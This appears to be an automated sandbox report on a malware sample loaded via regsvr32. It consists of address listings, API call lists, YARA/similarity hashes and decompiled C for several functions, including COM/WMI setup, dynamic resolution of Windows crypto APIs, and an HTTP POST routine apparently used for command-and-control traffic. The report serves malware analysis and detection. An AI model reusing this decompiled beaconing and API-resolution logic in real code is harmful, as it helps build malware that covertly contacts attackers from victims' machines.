                                                                                                                                                                        0x05b9ed64
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ed6a
                                                                                                                                                                        0x05b9ed6b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ed6b
                                                                                                                                                                        0x05b9ecd1
                                                                                                                                                                        0x05b9ecd1
                                                                                                                                                                        0x05b9ecd4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecd6
                                                                                                                                                                        0x05b9ecd9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecdb
                                                                                                                                                                        0x05b9ecdb
                                                                                                                                                                        0x05b9ece1
                                                                                                                                                                        0x05b9ecfd
                                                                                                                                                                        0x05b9ed0c
                                                                                                                                                                        0x05b9ed15
                                                                                                                                                                        0x05b9ed1a
                                                                                                                                                                        0x05b9ed1d
                                                                                                                                                                        0x05b9ed23
                                                                                                                                                                        0x05b9ed23
                                                                                                                                                                        0x05b9ed28
                                                                                                                                                                        0x05b9ed34
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ed34
                                                                                                                                                                        0x05b9ece6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ece6
                                                                                                                                                                        0x05b9ec89
                                                                                                                                                                        0x05b9ecb0
                                                                                                                                                                        0x05b9ecb5
                                                                                                                                                                        0x05b9ecba
                                                                                                                                                                        0x05b9ecbc
                                                                                                                                                                        0x05b9ecbc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecba
                                                                                                                                                                        0x05b9ec8b
                                                                                                                                                                        0x05b9ec8b
                                                                                                                                                                        0x05b9ec8e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ec94
                                                                                                                                                                        0x05b9ec94
                                                                                                                                                                        0x05b9ec97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ec9d
                                                                                                                                                                        0x05b9ec9d
                                                                                                                                                                        0x05b9eca0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eca6
                                                                                                                                                                        0x05b9eca9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ecab
                                                                                                                                                                        0x05b9eded
                                                                                                                                                                        0x05b9edf3
                                                                                                                                                                        0x05b9edf9
                                                                                                                                                                        0x05b9edfc
                                                                                                                                                                        0x05b9edff
                                                                                                                                                                        0x05b9edff
                                                                                                                                                                        0x05b9ee02
                                                                                                                                                                        0x05b9ee03
                                                                                                                                                                        0x05b9ee06
                                                                                                                                                                        0x05b9ee08
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ee58
                                                                                                                                                                        0x05b9ee58
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ee58
                                                                                                                                                                        0x05b9eb8f
                                                                                                                                                                        0x05b9eb95
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eb95
                                                                                                                                                                        0x05b9ee55
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ead8
                                                                                                                                                                        0x05b9eadd
                                                                                                                                                                        0x05b9eae2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eae6

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B9E400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E413
                                                                                                                                                                          • Part of subcall function 05B9E400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E424
                                                                                                                                                                          • Part of subcall function 05B9E400: CoCreateInstance.OLE32(05BAC868,00000000,00000001,05BAC878,?,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E43B
                                                                                                                                                                          • Part of subcall function 05B9E400: SysAllocString.OLEAUT32(00000000), ref: 05B9E446
                                                                                                                                                                          • Part of subcall function 05B9E400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E471
                                                                                                                                                                          • Part of subcall function 05B98BDE: RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9EAF3
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9EB07
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9EE90
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9EE99
                                                                                                                                                                          • Part of subcall function 05B98BF4: HeapFree.KERNEL32(00000000,00000000), ref: 05B98C3A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                        • String ID: FALSE$TRUE
                                                                                                                                                                        • API String ID: 1290676130-1412513891
                                                                                                                                                                        • Opcode ID: e701b966a3364a73199951a4549df30784317d019bca9237bf65d811764acfe8
                                                                                                                                                                        • Instruction ID: 561103878d09b8e915043cc42c73f0db9b9589a79d0c4c70fd6804f3d4ebe1e5
                                                                                                                                                                        • Opcode Fuzzy Hash: e701b966a3364a73199951a4549df30784317d019bca9237bf65d811764acfe8
                                                                                                                                                                        • Instruction Fuzzy Hash: 76E13C71A00219AFDF18DFA8C889AAEBBB9FF49300F1444A9E506A7254DB31F941CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05BA28F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E05BA28F0(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E05BA284B( &_v16);
				return 0;
			}











                                                                                                                                                                        0x05ba28f6
                                                                                                                                                                        0x05ba2908
                                                                                                                                                                        0x05ba290c
                                                                                                                                                                        0x05ba2980
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba2982
                                                                                                                                                                        0x05ba291c
                                                                                                                                                                        0x05ba2920
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba2928
                                                                                                                                                                        0x05ba292a
                                                                                                                                                                        0x05ba292f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba2939
                                                                                                                                                                        0x05ba293d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba293f
                                                                                                                                                                        0x05ba2944
                                                                                                                                                                        0x05ba2946
                                                                                                                                                                        0x05ba2948
                                                                                                                                                                        0x05ba294d
                                                                                                                                                                        0x05ba2952
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba295d
                                                                                                                                                                        0x05ba2967
                                                                                                                                                                        0x05ba296b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba297a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,05B97B6A), ref: 05BA2902
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 05BA291A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 05BA2928
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 05BA2937
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                        • API String ID: 667068680-129414566
                                                                                                                                                                        • Opcode ID: 9503570ea6a85d89fd4585ed007f1a410602e5f29611b2990bd8f125c134fa52
                                                                                                                                                                        • Instruction ID: 5d61a9b45b4c907ebc870a7853456cf13640e4b01cb404556b84c362ce576efb
                                                                                                                                                                        • Opcode Fuzzy Hash: 9503570ea6a85d89fd4585ed007f1a410602e5f29611b2990bd8f125c134fa52
                                                                                                                                                                        • Instruction Fuzzy Hash: 24118237A5830A77DB2197A48C45F9EF6ACAF84A50F1500B0F601F7150EA70FA0197A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9F7A6 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E05B9F7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E05B99DD8(0xd62);
				_v52 = E05B99DD8(0x8e9);
				_v48 = E05B99DD8(0xa93);
				_v44 = E05B99DD8(0x9a9);
				_t94 = E05B99DD8(0xb64);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E05B98D6D( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E05B9A43D(_t190));
				_t102 =  *0x5baf838; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x5baf838; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x5baf920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E05B9F73E(_t189);
							_t110 =  *0x5baf838; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E05B9A065(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x5baf838; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E05B9A065(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E05B9F6EC(_t116);
									}
									_t117 = E05B99DD8(0x901);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x5baf838; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E05B9A43D(_t193), _a4, _a8);
									E05B98B9C( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E05B9A065(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E05B98D6D( &_v20, 0, _t122);
										_t127 =  *0x5baf838; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E05B99F6F( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x5baf838; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x5baf838; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x5baf838; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x5baf838; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x5baf838; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x5baf838; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x5baf838; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x5baf838; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x5baf838; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}





























































                                                                                                                                                                        0x05b9f7b4
                                                                                                                                                                        0x05b9f7c0
                                                                                                                                                                        0x05b9f7c7
                                                                                                                                                                        0x05b9f7d4
                                                                                                                                                                        0x05b9f7d7
                                                                                                                                                                        0x05b9f7e8
                                                                                                                                                                        0x05b9f7ff
                                                                                                                                                                        0x05b9f80c
                                                                                                                                                                        0x05b9f819
                                                                                                                                                                        0x05b9f826
                                                                                                                                                                        0x05b9f829
                                                                                                                                                                        0x05b9f82e
                                                                                                                                                                        0x05b9f833
                                                                                                                                                                        0x05b9f835
                                                                                                                                                                        0x05b9f83d
                                                                                                                                                                        0x05b9f845
                                                                                                                                                                        0x05b9f84c
                                                                                                                                                                        0x05b9f858
                                                                                                                                                                        0x05b9f85b
                                                                                                                                                                        0x05b9f869
                                                                                                                                                                        0x05b9f86c
                                                                                                                                                                        0x05b9f872
                                                                                                                                                                        0x05b9f873
                                                                                                                                                                        0x05b9f875
                                                                                                                                                                        0x05b9f87e
                                                                                                                                                                        0x05b9f87f
                                                                                                                                                                        0x05b9f884
                                                                                                                                                                        0x05b9f88a
                                                                                                                                                                        0x05b9f894
                                                                                                                                                                        0x05b9f894
                                                                                                                                                                        0x05b9f896
                                                                                                                                                                        0x05b9f89b
                                                                                                                                                                        0x05b9f8a5
                                                                                                                                                                        0x05b9f8b0
                                                                                                                                                                        0x05b9f8b9
                                                                                                                                                                        0x05b9f8bb
                                                                                                                                                                        0x05b9f8bd
                                                                                                                                                                        0x05b9f8cc
                                                                                                                                                                        0x05b9f8e3
                                                                                                                                                                        0x05b9f8e9
                                                                                                                                                                        0x05b9f8ec
                                                                                                                                                                        0x05b9f8f0
                                                                                                                                                                        0x05b9f8f2
                                                                                                                                                                        0x05b9f8f7
                                                                                                                                                                        0x05b9f8f7
                                                                                                                                                                        0x05b9f8fc
                                                                                                                                                                        0x05b9f8fe
                                                                                                                                                                        0x05b9f914
                                                                                                                                                                        0x05b9f918
                                                                                                                                                                        0x05b9f91d
                                                                                                                                                                        0x05b9f91f
                                                                                                                                                                        0x05b9f91f
                                                                                                                                                                        0x05b9f933
                                                                                                                                                                        0x05b9f93e
                                                                                                                                                                        0x05b9f941
                                                                                                                                                                        0x05b9f944
                                                                                                                                                                        0x05b9f947
                                                                                                                                                                        0x05b9f94c
                                                                                                                                                                        0x05b9f951
                                                                                                                                                                        0x05b9f951
                                                                                                                                                                        0x05b9f954
                                                                                                                                                                        0x05b9f956
                                                                                                                                                                        0x05b9f97c
                                                                                                                                                                        0x05b9f980
                                                                                                                                                                        0x05b9f984
                                                                                                                                                                        0x05b9f984
                                                                                                                                                                        0x05b9f98e
                                                                                                                                                                        0x05b9f996
                                                                                                                                                                        0x05b9f99b
                                                                                                                                                                        0x05b9f9a6
                                                                                                                                                                        0x05b9f9ac
                                                                                                                                                                        0x05b9f9b6
                                                                                                                                                                        0x05b9f9b9
                                                                                                                                                                        0x05b9f9be
                                                                                                                                                                        0x05b9f9c2
                                                                                                                                                                        0x05b9f9c7
                                                                                                                                                                        0x05b9f9c7
                                                                                                                                                                        0x05b9f9cc
                                                                                                                                                                        0x05b9f9d0
                                                                                                                                                                        0x05b9fa1b
                                                                                                                                                                        0x05b9fa1d
                                                                                                                                                                        0x05b9fa20
                                                                                                                                                                        0x05b9fa28
                                                                                                                                                                        0x05b9fa2c
                                                                                                                                                                        0x05b9fa2f
                                                                                                                                                                        0x05b9fa41
                                                                                                                                                                        0x05b9fa4c
                                                                                                                                                                        0x05b9fa4e
                                                                                                                                                                        0x05b9fa62
                                                                                                                                                                        0x05b9fa67
                                                                                                                                                                        0x05b9fa6c
                                                                                                                                                                        0x05b9faa1
                                                                                                                                                                        0x05b9faa6
                                                                                                                                                                        0x05b9faab
                                                                                                                                                                        0x05b9faad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9faad
                                                                                                                                                                        0x05b9fa70
                                                                                                                                                                        0x05b9fa73
                                                                                                                                                                        0x05b9fa73
                                                                                                                                                                        0x05b9fa79
                                                                                                                                                                        0x05b9fa7c
                                                                                                                                                                        0x05b9fa7f
                                                                                                                                                                        0x05b9fa7f
                                                                                                                                                                        0x05b9fa81
                                                                                                                                                                        0x05b9fa83
                                                                                                                                                                        0x05b9fa89
                                                                                                                                                                        0x05b9fa89
                                                                                                                                                                        0x05b9fa8c
                                                                                                                                                                        0x05b9fa8e
                                                                                                                                                                        0x05b9fa90
                                                                                                                                                                        0x05b9fa97
                                                                                                                                                                        0x05b9fa97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9fa9a
                                                                                                                                                                        0x05b9fa50
                                                                                                                                                                        0x05b9fa56
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9f9d2
                                                                                                                                                                        0x05b9f9d2
                                                                                                                                                                        0x05b9f9d8
                                                                                                                                                                        0x05b9f9de
                                                                                                                                                                        0x05b9f9e1
                                                                                                                                                                        0x05b9f9e6
                                                                                                                                                                        0x05b9f9eb
                                                                                                                                                                        0x05b9f9ee
                                                                                                                                                                        0x05b9f9f3
                                                                                                                                                                        0x05b9f9f3
                                                                                                                                                                        0x05b9f9f6
                                                                                                                                                                        0x05b9f9f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9f9f9
                                                                                                                                                                        0x05b9f958
                                                                                                                                                                        0x05b9f958
                                                                                                                                                                        0x05b9f95e
                                                                                                                                                                        0x05b9f964
                                                                                                                                                                        0x05b9f967
                                                                                                                                                                        0x05b9f96c
                                                                                                                                                                        0x05b9f96f
                                                                                                                                                                        0x05b9f972
                                                                                                                                                                        0x05b9f974
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9f974
                                                                                                                                                                        0x05b9f900
                                                                                                                                                                        0x05b9f900
                                                                                                                                                                        0x05b9f906
                                                                                                                                                                        0x05b9f90c
                                                                                                                                                                        0x05b9f9fc
                                                                                                                                                                        0x05b9f9fc
                                                                                                                                                                        0x05b9f9fc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9f9fc
                                                                                                                                                                        0x05b9f8fe
                                                                                                                                                                        0x05b9f8bf
                                                                                                                                                                        0x05b9f9fe
                                                                                                                                                                        0x05b9fa01
                                                                                                                                                                        0x05b9fa03
                                                                                                                                                                        0x05b9fa06
                                                                                                                                                                        0x05b9fa09
                                                                                                                                                                        0x05b9fa09
                                                                                                                                                                        0x05b9fa12
                                                                                                                                                                        0x05b9fa14
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9fa18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9fa18
                                                                                                                                                                        0x05b9f88e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 05B9F7D7
                                                                                                                                                                        • memset.MSVCRT ref: 05B9F7E8
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 05B9F8BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast
                                                                                                                                                                        • String ID: POST
                                                                                                                                                                        • API String ID: 2570506013-1814004025
                                                                                                                                                                        • Opcode ID: 2e7d752fac9a5c6b028b9ba2a02e366e5364c0e272a94398c9c3305fe6bc29fd
                                                                                                                                                                        • Instruction ID: bd0876791fe0b6e4005eadfe299285862b3f6ceece9ca59119463b7712894240
                                                                                                                                                                        • Opcode Fuzzy Hash: 2e7d752fac9a5c6b028b9ba2a02e366e5364c0e272a94398c9c3305fe6bc29fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 83A12975A00218AFDF15DFA4D889AFE7BB9EF48320F1041A9F905E7250DB34AA85CB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05BA1464 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snprintfqsort
                                                                                                                                                                        • String ID: %I64d$false$null$true
                                                                                                                                                                        • API String ID: 756996078-4285102228
                                                                                                                                                                        • Opcode ID: 89bcba1e26039b366cb359ea959e5b2406c40d1b0c5c105296b10441efa67317
                                                                                                                                                                        • Instruction ID: d94abddca4830430fba92bfa5f32550d34cbf9a6fef910a4fa5dd9a986c87516
                                                                                                                                                                        • Opcode Fuzzy Hash: 89bcba1e26039b366cb359ea959e5b2406c40d1b0c5c105296b10441efa67317
                                                                                                                                                                        • Instruction Fuzzy Hash: 34E17E73A0820ABBDF519F68CC45EBF3B6AEF44740F148099FD1596140E731EA61DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B950B3 Relevance: 9.3, APIs: 6, Instructions: 263stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E05B950B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				signed int _v588;
				intOrPtr _v592;
				WCHAR* _v596;
				char _v600;
				intOrPtr _v604;
				char _v632;
				char _v636;
				void* __ebx;
				void* __esi;
				intOrPtr _t56;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t72;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t79;
				signed int _t81;
				intOrPtr _t82;
				WCHAR* _t84;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t97;
				signed char _t104;
				void* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t113;
				void* _t114;
				WCHAR* _t115;
				void* _t126;
				WCHAR* _t130;
				intOrPtr _t142;
				void* _t143;
				void* _t163;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t173;
				signed int _t174;
				WCHAR* _t176;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t180;
				signed int _t182;
				void* _t185;
				void* _t186;
				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x5baf81c; // 0x5d5fbe8
					_t5 = _t108 + 0x110; // 0x5d616b8
					_t110 =  *0x5baf820; // 0x5d5faa0
					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
				}
				if(E05B9C9F4(_t173) != 0) {
					L4:
					_t56 = E05B9C6CE();
					_push(_t113);
					_v592 = _t56;
					E05B9C4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E05B95072( &_v580,  &_v580, _t190);
					_t126 = E05B9E2C5( &_v580, E05B9A43D( &_v580), 0);
					E05B9C6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E05B9317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x5bac9a0);
						_t115 = E05B99A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x5baf81c; // 0x5d5fbe8
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E05B998BD(_v600);
								_t130 = _t115;
								 *0x5baf8d8 = _t66;
								 *0x5baf8d0 = E05B998BD(_t130);
								L17:
								_push(_t130);
								_t174 = E05B9A633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x5bac9f2);
								_t163 = 0xe;
								E05B9AAA3(_t163, _t192);
								E05B9AADC(_t174, _t192, _t115);
								_t180 = _a4;
